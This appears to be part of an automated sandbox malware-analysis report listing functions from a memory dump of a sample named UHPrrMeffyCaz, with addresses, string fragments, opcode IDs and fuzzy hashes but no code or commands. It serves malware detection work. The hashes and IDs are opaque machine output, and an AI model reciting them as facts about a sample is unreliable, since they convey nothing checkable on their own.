                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 92f4e7bc5510708589b966870da68a0f2ea78c1f8f63cf1cc22581769d614cf3
                                                                                                                                                              • Instruction ID: be99c6ad16cf67979fa514fc43b77b8d68b821b6c22ff08f427d3714cbb81c9e
                                                                                                                                                              • Opcode Fuzzy Hash: 92f4e7bc5510708589b966870da68a0f2ea78c1f8f63cf1cc22581769d614cf3
                                                                                                                                                              • Instruction Fuzzy Hash: 9531B4516593F14ED31E836D08B9679AEC28F5720174EC2EEDADA5F2E3C4848409D3A5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 05011992 Relevance: 45.5, Strings: 36, Instructions: 459COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: !$"n$#$$0d$3W$3e$5$5x$8'$?I$@F$C$DN$F$Fe$G$Kd$QX$XG$Y$Ym$]$^.$_UFe$`$e$ee$g$i$kq$myD_UFe$p$r$s$s$ue
                                                                                                                                                              • API String ID: 0-3119237632
                                                                                                                                                              • Opcode ID: da353cc70ae12a6897981a1cb2b93527904e9318e3329fd78ea254f66f90e1c5
                                                                                                                                                              • Instruction ID: 50a0e002d50d828ce627048c084a7a7f1b06481fe83c4f94566fb5b67aae1948
                                                                                                                                                              • Opcode Fuzzy Hash: da353cc70ae12a6897981a1cb2b93527904e9318e3329fd78ea254f66f90e1c5
                                                                                                                                                              • Instruction Fuzzy Hash: 6142CFB4D05229CBEB24CF45D998BEDBBB2BF45308F1081D9C9096B281C7B95AC9CF45
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0501E932 Relevance: 6.4, Strings: 5, Instructions: 147COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 6$O$S$\$s
                                                                                                                                                              • API String ID: 0-3854637164
                                                                                                                                                              • Opcode ID: 663f117a7a731cd6a437ff0b701c2823fdab240e75330c31bc639145ba10d504
                                                                                                                                                              • Instruction ID: 51b817e2cddecb2703be46203d686fdc86a244bc7772813db88af35300c16fc9
                                                                                                                                                              • Opcode Fuzzy Hash: 663f117a7a731cd6a437ff0b701c2823fdab240e75330c31bc639145ba10d504
                                                                                                                                                              • Instruction Fuzzy Hash: A241B2B2A01119BBDB10EAE4EC48EFEB7BCFB54310F548199ED0D97140E775AA148BE1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0502B422 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Zu
                                                                                                                                                              • API String ID: 0-568468114
                                                                                                                                                              • Opcode ID: 8503559ac2e27f5fe0adbbe477759ba016ee8d31cde928e93d73a4d1deb3c081
                                                                                                                                                              • Instruction ID: 67c469878789206a910c2ced480185f681748b3ba8adef3b96357d5c823712bf
                                                                                                                                                              • Opcode Fuzzy Hash: 8503559ac2e27f5fe0adbbe477759ba016ee8d31cde928e93d73a4d1deb3c081
                                                                                                                                                              • Instruction Fuzzy Hash: DD11ECB2D0121CAFDB40DFE9DD419EEBBF8FF58210F14416AE919E7200E7749A048BA1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 05027D14 Relevance: .2, Instructions: 235COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 7a330649e92d27264057bec7858aed4c0c0db8b3fe4a7317970a58d3ecab6744
                                                                                                                                                              • Instruction ID: 36367ec0ed3cad27895b34e22128c6ebabbf58cdba7f46a9d9b0fc7f06e97ede
                                                                                                                                                              • Opcode Fuzzy Hash: 7a330649e92d27264057bec7858aed4c0c0db8b3fe4a7317970a58d3ecab6744
                                                                                                                                                              • Instruction Fuzzy Hash: 736121321086768FCF1ADF38A8805FDBFB2FA8531035842AEC9918F243D7229407C7A1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 050275E9 Relevance: .2, Instructions: 169COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 1e25bc1f24a6a9702a58a6d98d543f02ff80c740c951fd81e11122e53a9cc05e
                                                                                                                                                              • Instruction ID: 86fa807ab2a2a638bdd7f222603826c858488eb5bf5cb98694d901c7ba1a6866
                                                                                                                                                              • Opcode Fuzzy Hash: 1e25bc1f24a6a9702a58a6d98d543f02ff80c740c951fd81e11122e53a9cc05e
                                                                                                                                                              • Instruction Fuzzy Hash: 4641EB73A096614BC311EA7CE8C94FEFBB9EB9612071407EFEC88CB612D6225805C3D1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0500AFB2 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 77bfa915346c419215ced3a1da88a55352111c9f3a4ccfcb181a3fe0681f6cd5
                                                                                                                                                              • Instruction ID: bbdff18ab6d15b31cc1f3103876119e3794e4fba386334a2f31d4837770c5cc2
                                                                                                                                                              • Opcode Fuzzy Hash: 77bfa915346c419215ced3a1da88a55352111c9f3a4ccfcb181a3fe0681f6cd5
                                                                                                                                                              • Instruction Fuzzy Hash: A5410CB1D11228AFDB04CF99D885AEEBBBCFF49710F10415AFA14E7240E7B59640CBA4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 050179E2 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: f8be4d1f2cea7b9a440d70b5c671d4aabf6c7a6c2c0545364472d6a9c976149b
                                                                                                                                                              • Instruction ID: 4fe5871c3ab5f3d2ca4ba6a491cbb6e6f22c5da71ab52371442bb4825455ecff
                                                                                                                                                              • Opcode Fuzzy Hash: f8be4d1f2cea7b9a440d70b5c671d4aabf6c7a6c2c0545364472d6a9c976149b
                                                                                                                                                              • Instruction Fuzzy Hash: 0C21263664432426CB20AE74EC8CFFF73ADFF94300F844599EC1982181FA709A4087A6
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 050179D7 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 6a3a75f8f8c99e9db62e84433dfe905f4f68b5c62c2740eb3eab93c658fdb7eb
                                                                                                                                                              • Instruction ID: 9815d9f4e2cd8895da4731d848f9db90e078e7d131c1f50568ac6c2542fa6555
                                                                                                                                                              • Opcode Fuzzy Hash: 6a3a75f8f8c99e9db62e84433dfe905f4f68b5c62c2740eb3eab93c658fdb7eb
                                                                                                                                                              • Instruction Fuzzy Hash: 23213736A4032466CB60EE74EC8CFFF73ADFF94300F944559EC1A92181FA70964087A6
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0502C402 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: ac09151ae2de02c380c8794f522cbd0e2a3baa99de870694cad17f0140208203
                                                                                                                                                              • Instruction ID: 2bbc2bed355145f8590d30e5ba2995e494d066c23b2a374156a862c225f0a808
                                                                                                                                                              • Opcode Fuzzy Hash: ac09151ae2de02c380c8794f522cbd0e2a3baa99de870694cad17f0140208203
                                                                                                                                                              • Instruction Fuzzy Hash: AB21C2B2201609BFEB44DF98DC84EEB73ADAF8C714F008608FA5D93240D634ED518BA4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0502C532 Relevance: .1, Instructions: 79COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 9fe8c37de8c01f0ccb16eb15b2b9db5af8fd67254717c0140500df9b126258ef
                                                                                                                                                              • Instruction ID: 114b275eca114cd826b3f53511255a9ee1ce0d4e2632294dd5b78522872b506e
                                                                                                                                                              • Opcode Fuzzy Hash: 9fe8c37de8c01f0ccb16eb15b2b9db5af8fd67254717c0140500df9b126258ef
                                                                                                                                                              • Instruction Fuzzy Hash: 0221C6B2200509AFDB14DF98DC84EEB73ADAF9C714F14860CFA5D97240D634ED118BA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0501E772 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 77c44d9cf2f5d1790beee601bcb1eafad6d4b41a0c6ae96533e94ae82c8d738f
                                                                                                                                                              • Instruction ID: ede1fb3b5c639ae91c88703afb5300f914adc52c9172cca651a6d28748c406c9
                                                                                                                                                              • Opcode Fuzzy Hash: 77c44d9cf2f5d1790beee601bcb1eafad6d4b41a0c6ae96533e94ae82c8d738f
                                                                                                                                                              • Instruction Fuzzy Hash: 2A1186723802257BF720AE59EC82FAF375CAB94F50F244015FF08AA5C0D6A5F81147B9
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0502E578 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 685d10aecbdde073ab4b8ca095e36f9a4faed7e65b52c8bb5d024b29a357888a
                                                                                                                                                              • Instruction ID: ea168432bf122018097493d5dfd6433c1bad4ee893c065b63ae32ae7907ea81a
                                                                                                                                                              • Opcode Fuzzy Hash: 685d10aecbdde073ab4b8ca095e36f9a4faed7e65b52c8bb5d024b29a357888a
                                                                                                                                                              • Instruction Fuzzy Hash: BD112336B816B027D7201559AC08BAF779CDFD1A60F1D40BDFE4DAB242F564A90142A1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0502BEC2 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 9c2577be4323bfdbc0df53996fd9425dba7eb0bbd745f547d46a316b77b4a328
                                                                                                                                                              • Instruction ID: 658d231cda8396624473de488c464d0110a8616f515973d32fbf7885fd4d1042
                                                                                                                                                              • Opcode Fuzzy Hash: 9c2577be4323bfdbc0df53996fd9425dba7eb0bbd745f547d46a316b77b4a328
                                                                                                                                                              • Instruction Fuzzy Hash: 2911E4B2200619BFDB14DF99EC84EEB73EDAF9C704F008518FA5D93241D634AD128BA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 05027743 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: bf31f2e876076f5fc3152dc6755acefe997ad3595d93b97032193964a71d2a17
                                                                                                                                                              • Instruction ID: 7eac730c57b2d896436e6aaca517e90c0133a61907340774b53b1c0274a2fd5d
                                                                                                                                                              • Opcode Fuzzy Hash: bf31f2e876076f5fc3152dc6755acefe997ad3595d93b97032193964a71d2a17
                                                                                                                                                              • Instruction Fuzzy Hash: 8901BE72F401247BF710D958FCC5FBEB36CEB95610F14459AFD04DB240E565AD1057A2
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0502C712 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 50f5aeb6ac8e6c04103c304e34e9c45e73a5f0a10f8a5923c71f0f1c7171ac71
                                                                                                                                                              • Instruction ID: d9d95eebe553a8f436649be2858521e5ddbc7f4f7671c877a464513d7d0b051f
                                                                                                                                                              • Opcode Fuzzy Hash: 50f5aeb6ac8e6c04103c304e34e9c45e73a5f0a10f8a5923c71f0f1c7171ac71
                                                                                                                                                              • Instruction Fuzzy Hash: D711F8B2200655BBDB14EF98EC45EAF73ADEF99610F008509FA5997280D630AD118BB5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0502AD32 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: f3243384225820ad1c8ae8e35010212473341618229bf924b9a1e6d28cd17d5f
                                                                                                                                                              • Instruction ID: d8e45febc9e078c97b5d3cb0a669e247efb370a5b630a5e64b2a2b3069d2a688
                                                                                                                                                              • Opcode Fuzzy Hash: f3243384225820ad1c8ae8e35010212473341618229bf924b9a1e6d28cd17d5f
                                                                                                                                                              • Instruction Fuzzy Hash: C511F1B6E0121DAF9B00DFA9D9409EFB7F9FF59210F04416AE915F7200E7749A148BA1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0502A892 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: a425dcb783a96bda6e108b866a95bd3306fcf022b66d14127879edb147a3b99d
                                                                                                                                                              • Instruction ID: a7958b0d2cc79083ce00a163e3b0b23707a21018835e4deb69c04b06539eadec
                                                                                                                                                              • Opcode Fuzzy Hash: a425dcb783a96bda6e108b866a95bd3306fcf022b66d14127879edb147a3b99d
                                                                                                                                                              • Instruction Fuzzy Hash: 18111FB6E1111CAF9B00DFE9D9409EFB7F8FF58200F04416AE919E3200E7705A048BA1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 05027BE2 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 0cf881d077c766d7f979b98e9aacdb37a359468740e04bac9ba967b3424891b9
                                                                                                                                                              • Instruction ID: f95fc7443b93b6a272d16004dd8693190e16c7b326ef0ff4a8ede8a51005e8b2
                                                                                                                                                              • Opcode Fuzzy Hash: 0cf881d077c766d7f979b98e9aacdb37a359468740e04bac9ba967b3424891b9
                                                                                                                                                              • Instruction Fuzzy Hash: 3701C0B6B402387BE710AA64EC4DDFFB36CEF65610F104296FD1893240FA64AE5147E5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0502CA0C Relevance: .1, Instructions: 59COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: c70c70ad0f92251847618d5563fdc75050762b3f3595e7b2f0a82a7b4b7f3631
                                                                                                                                                              • Instruction ID: 32bf9b0e20666ffd44c5d07842495e68c84d324a21e7d2ff5e286991593da1dc
                                                                                                                                                              • Opcode Fuzzy Hash: c70c70ad0f92251847618d5563fdc75050762b3f3595e7b2f0a82a7b4b7f3631
                                                                                                                                                              • Instruction Fuzzy Hash: 3811F7B6204118BBDB04EE99EC81EDB77ADEF8C710F048109FA0DE3241DA30ED118BA4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0502BD02 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: cfddb0bb8398ed53b7ed28904f967a14f64f34fb564dbe3c523f0df6d73801d2
                                                                                                                                                              • Instruction ID: 99c0c97c7709574d953fa0d4b3e1fec8bc58289610ffa5814a27b42b6d0c57f8
                                                                                                                                                              • Opcode Fuzzy Hash: cfddb0bb8398ed53b7ed28904f967a14f64f34fb564dbe3c523f0df6d73801d2
                                                                                                                                                              • Instruction Fuzzy Hash: 0F015E71200654BBEA10AA54DC48FAF73ACEF85711F00840DFA5897240D774BD018BB1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0502BBE2 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: b4f69a8d46f1c1e083d8d8f5b720278c3997c04ec6b4cabcc7c8d9501a53dbf6
                                                                                                                                                              • Instruction ID: 4eaa65c2bb9adef9f104d344f18bb3cae740e49b7f346ec44cfa03459f4f1394
                                                                                                                                                              • Opcode Fuzzy Hash: b4f69a8d46f1c1e083d8d8f5b720278c3997c04ec6b4cabcc7c8d9501a53dbf6
                                                                                                                                                              • Instruction Fuzzy Hash: EF015EB22002147BE610AA58DC48EBF73ACFF95310F40881DFA9997240DB74BD1587B5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0500AFA3 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 61361677125ca5c464489a719f6ea5ad326e7d657cd1450b1f51e9fa995a4911
                                                                                                                                                              • Instruction ID: c829388afb090989a604eb4fed1b499cd258e34e493c8121ce30a1b7124a4bf3
                                                                                                                                                              • Opcode Fuzzy Hash: 61361677125ca5c464489a719f6ea5ad326e7d657cd1450b1f51e9fa995a4911
                                                                                                                                                              • Instruction Fuzzy Hash: 0311E8B1D242289F8B40CFAD94841EDBFF8FB09620B10825BE868E7240D7B186418FD5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0502CA12 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: dc30fb65775e73fbda3954eec95ed66d1a2db8f0e204a2e990e2ae94dc159d13
                                                                                                                                                              • Instruction ID: 6448adf3370f17e9ffff4c0acca1563b3f8a329a1d0ada0fd07cae8e0d173c26
                                                                                                                                                              • Opcode Fuzzy Hash: dc30fb65775e73fbda3954eec95ed66d1a2db8f0e204a2e990e2ae94dc159d13
                                                                                                                                                              • Instruction Fuzzy Hash: 0B01C0B2201208BBDB44DF89DC84EDB77ADAF8C710F008208FA09E3240DA30EC518BA4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

